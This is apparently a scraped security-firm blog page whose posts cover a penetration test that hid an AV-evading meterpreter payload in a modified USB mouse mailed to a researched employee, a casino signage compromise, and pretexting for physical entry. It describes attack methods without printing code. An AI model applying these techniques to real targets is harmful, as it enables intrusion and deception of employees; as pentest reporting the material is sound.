To make this happen we created a meterpreter C array with the windows/meterpreter/reverse_tcp_dns payload. We then took that C array, chopped it up and injected it into our own wrapper of sorts. The wrapper used an undocumented (0-day) technique to completely subvert the dialogue box and to evade detection by Mcafee. When we ran our tests on a machine running Mcafee, the malware ran without a hitch. We should point out that our ability to evade Mcafee isn’t any indication of quality and that we can evade any Antivirus solution using similar custom attack methodologies. After all, its impossible to detect something if you don’t know what it is that you are looking for (It also helps to have a team of researchers at our disposal).

Once we had our malware built we loaded it onto the flash drive that we soldered into our mouse. Then we wrote some code for the teensy microcontroller to launch the malware 60 seconds after the start of user activity. Much of the code was taken from Adrian Crenshaw’s website who deserves credit for giving us this idea in the first place. After a little bit of debugging, our evil mouse named prion was working flawlessly.

Usage: Plug mouse into computer, get pwned.

The last and final step here was to ship the mouse to our customer. One of the most important aspects of this was to repack the mouse in its original package so that it appeared unopened. Then we used Jigsaw to purchase a list of our client’s employes. We did a bit of reconnaissance on each employee and found a target that looked ideal. We packaged the mouse and made it look like a promotional gadget, added fake marketing flyers, etc. then shipped the mouse. Sure enough, three days later the mouse called home.

 

PDF Download    Send article as PDF   

Netragard Signage Snatching

Recently Netragard has had a few discussions with owners and operators of sports arenas, with the purpose of identifying methods in which a malicious hacker could potentially disrupt a sporting event, concert, or other large scale and highly visible event.

During the course of the these conversations, the topic of discussion shifted from network exploitation to social engineering, with a focus on compromise of the digital signage systems.  Until recently, even I hadn’t thought about how extensively network controlled signage systems are used in facilities like casinos, sports arenas, airports, and roadside billboards.  That is, until our most recent casino project.

Netragard recently completed a Network Penetration Test and Social Engineering Test for a large west coast casino, with spectacular results. Not only were our engineers able to gain the keys to the kingdom, they were also able to gain access to the systems that had supervisory control for every single digital sign in the facility.  Some people may think to themselves, “ok, what’s the big deal with that?”.  The answer is simple:  Customer perception and corporate image.

Before I continue on, let me provide some background; Early in 2008, there were two incidents in California where two on-highway digital billboards were compromised, and their displays changed from the intended display.  While both of these incidents were small pranks in comparison to what they could have done, the effect was remembered by those who drove by and saw the signs.  (Example A, Example B)

Another recent billboard hack in Moscow, Russia, wasn’t as polite as the pranksters in California.  A hacker was able to gain control of a billboard in downtown Moscow (worth noting, Moscow is the 7th largest city in the world), and after subsequently gaining access, looped a video clip of pornographic material. (Example C) Imagine if this was a sports organization, and this happened during a major game.

Brining this post back on track, let’s refocus on the casino and the potential impact of signage compromise.  After spending time in the signage control server, we determined that there were over 40 unique displays available to control, some of which were over 100″ in display size.  WIth customer permission, we placed a unique image on a small sign for proof of concept purposes (go google “stallowned”).  This test, coupled with an impact audit, clearly highlighted to the casino that ensuring the security of their signage systems was nearly as paramount to securing their security systems, cage systems, and domain controllers.   All the domain security in the world means little to a customer if they’re presented with disruptive material on the signage during their visit to the casino.  A compromise of this nature could cause significant loss or revenue, and cause a customer to never re-visit the casino.

I also thought it pertinent for the purpose of this post to share another customer engagement story.  This story highlights how physical security can be compromised by a combination of social engineering and network exploitation, thus opening an additional risk vector that could allow for compromise of the local network running the digital display systems.

Netragard was engaged by a large bio-sciences company in late 2010 to assess the network and physical security of multiple locations belonging to a business unit that was a new acquisition.   During the course of this engagement, Netragard was able to take complete control of their network infrastructure remotely, as is the case in most of our engagements.  More so, our engineers were able to utilize the social engineering skills and “convince” the physical site staff to grant them building access.  Once passing this first layer of physical access, by combining social and network exploitation, they were subsequently able to gain access to sensitive labs and document storage rooms.  These facilities/rooms were key to the organizations intellectual property, and on-going research.  Had our engineers been hired by a competing company or other entity, there would have been a 100% chance that the IP (research data, trials data, and so forth) could have been spirited off company property and into hands unknown.

By combining network exploitation and social engineering, we’ve postulated to the sports arena operators that Netragard has a high probability of gaining access to the control systems for their digital signage.  Inevitably, during these discussions the organizations push back stating that their facilities have trained security staff and access control systems.  To that we inform them that the majority of sports facilities staff are more attuned to illicit access attempts in controlled areas, but only during certain periods of operation, such as active games, concerts, and other large scale events.   During non-public usage hours though, there’s a high probability that a skilled individual could gain entry to access controlled areas during a private event, or through beach of trust, such as posing as a repair technician, emergency services employee, or even a facility employee.

One area of concern for any organization, whether they be a football organization, Fortune 100 company, or a mid-size business, is breach of trust with their consumer base.  For a major sports organization, the level of national exposure and endearment far exceeds the exposure most Netragard customers have to the public.  Because of this extremely high national exposure, a sports organization and its arena are a prime target for those who may consider highly visible public disruption of games a key tool in furthering an socio-political agenda.  We’re hopeful that these organizations will continue to take a more serious stance to ensure that their systems and public image are as protected as possible.

– Mike Lockhart, VP of Operations

Create PDF    Send article as PDF   

Quality Penetration Testing by Netragard

The purpose of Penetration Testing is to identify the presence of points where an external entity can make its way into or through a protected entity. Penetration Testing is not unique to IT security and is used across a wide variety of different industries.  For example, Penetration Tests are used to assess the effectiveness of body armor.  This is done by exposing the armor to different munitions that represent the real threat. If a projectile penetrates the armor then the armor is revised and improved upon until it can endure the threat.

Network Penetration Testing is a class of Penetration Testing that applies to Information Technology. The purpose of Network Penetration Testing is to identify the presence of points where a threat (defined by the hacker) can align with existing risks to achieve penetration. The accurate identification of these points allows for remediation.

Successful penetration by a malicious hacker can result in the compromise of data with respect to Confidentiality, Integrity and Availability (“CIA”).  In order to ensure that a Network Penetration Test provides an accurate measure of risk (risk = probability x impact) the test must be delivered at a threat level that is slightly elevated from that which is likely to be faced in the real world. Testing at a lower than realistic threat level would be akin to testing a bulletproof vest with a squirt gun.

Threat levels can be adjusted by adding or removing attack classes. These attack classes are organized under three top-level categories, which are Network Attacks, Social Attacks, and Physical Attacks.  Each of the top-level categories can operate in a standalone configuration or can be used to augment the other.  For example, Network Penetration Testing with Social Engineering creates a significantly higher level of threat than just Network Penetration Testing or Social Engineering alone.  Each of the top-level threat categories contains numerous individual attacks.

A well-designed Network Penetration Testing engagement should employ the same attack classes as a real threat. This ensures that testing is realistic which helps to ensure effectiveness. All networked entities face threats that include Network and Social attack classes. Despite this fact, most Network Penetration Tests entirely overlook the Social attack class and thus test at radically reduced threat levels. Testing at reduced threat levels defeats the purpose of testing by failing to identify the same level of risks that would likely be identified by the real threat.  The level of threat that is produced by a Network Penetration Testing team is one of the primary measures of service quality.

PDF    Send article as PDF   

Hosted Solutions A Hackers Haven

Human beings are lazy by nature.If there is a choice to be made between a complicated technology solution and an easy technology solution, then nine times out of ten people will choose the easy solution.The problem is that the easy solutions are often riddled with hidden risks and those risks can end up costing the consumer more money in damages then what might be saved by using the easy solution.

The advantages of using a managed hosting provider to host your email, website, telephone systems, etc, are clear.When you outsource critical infrastructure components you save money.The savings are quickly realized because you no longer need to spend money running a full scale IT operation.In many cases, you don’t even need to worry about purchasing hardware, software, or even hiring IT staff to support the infrastructure.

What isn’t clear to most people is the serious risk that outsourcing can introduce to their business.In nearly all cases a business will have a radically lower risk and exposure profile if they keep everything in-house.This is true because of the substantial attack surface that hosting providers have when compared to in-house IT environments.

For example, a web-hosting provider might host 1,000 websites across 50 physical servers.If one of those websites contains a single vulnerability and that vulnerability is exploited by a hacker then the hacker will likely take control of the entire server.At that point the hacker will have successfully compromised and taken control of all 50 websites with a single attack.

In non-hosted environments there might be only one Internet facing website as opposed to the 1000 that exist in a hosted environment.As such the attack surface for this example would be 1000 times greater in a hosted environment than it is in a non-hosted environment.In a hosted environment the risks that other customers introduce to the infrastructure also become your risk.In a non-hosted environment you are only impacted by your own risks.

To make matters worse, many people assume that such a risk isn’t significant because they do not use their hosted systems for any critical transactions.They fail to consider the fact that the hacker can modify the contents of the compromised system.These modifications can involve redirecting online banking portal links, credit card form posting links, or even to spread infectious malware.While this is true for any compromised system, the chances of suffering a compromise in a hosted environment are much greater than in a non-hosted environment.

Free PDF    Send article as PDF   
Return top

INFORMATION

Change this sentence and title from admin Theme option page.